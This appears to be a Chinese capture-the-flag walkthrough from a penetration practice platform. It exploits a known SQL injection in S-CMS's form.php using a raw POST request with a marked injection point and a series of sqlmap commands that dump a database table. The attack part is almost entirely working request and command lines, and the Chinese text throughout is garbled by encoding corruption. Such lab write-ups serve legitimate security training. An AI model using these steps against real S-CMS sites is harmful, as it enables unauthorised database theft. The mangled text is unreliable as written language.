總體思路
- 通過(guò)title得知網(wǎng)站為s-cms
- 搜索引擎搜索s-cms歷史漏洞 : 找到sql注入
- sqlmap梭哈找到flag
分步演示
1. 查看title,發(fā)現(xiàn)為s-cms建站
2. 查找s-scms歷史漏洞,找到 form.php 存在sql注入 | sleep語(yǔ)句成功執(zhí)行
3. 在Q_sort=1后加 * ,將數(shù)據(jù)包保存為1.txt:
POST /form.php?action=query&S_id=0 HTTP/1.1
Host: 106.15.50.112:8035
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=7bd4d643075464524223fc70d32e7a30; authorization=fail; authorization4=1MHwwfHMxMXxzMTA0fHM5NHxzOTV8czk5fHM5Nnx3NHx3OTR8dzk1fHc5Nnx3MTA0fHBjMTM1fHBjMTQ2fHBjMTA0fHBjOTR8cGM5NXxwYzk5fHBjOTZ8d2FwMTM1fHdhcDE0Nnx3YXA5NHx3YXA5NXx3YXA5Nnx3YXAxMDR8; __tins__18885840=%7B%22sid%22%3A%201668687646080%2C%20%22vd%22%3A%2020%2C%20%22expires%22%3A%201668689481280%7D; __51cke__=; __51laig__=20
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Q_sort=1*
4. sqlmap 跑數(shù)據(jù)包
sqlmap -r D:\sqlmap-txt\1.txt --batch
5. 讀庫(kù) | 使用聯(lián)合查詢, 速度較快
sqlmap -r D:\sqlmap-txt\1.txt --tech U --dbs --batch
6. 查看scms庫(kù)的所有表
sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms --tables --batch
7. 查看SL_flag表的所有字段
sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms -T SL_flag --columns --batch
8. 讀取flag字段內(nèi)容
sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms -T SL_flag -C "flag" --dump --batch
文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-552154.html
文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-552154.html
到了這里,關(guān)于【安鸞滲透實(shí)戰(zhàn)平臺(tái)】實(shí)戰(zhàn)滲透/企業(yè)網(wǎng)站的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!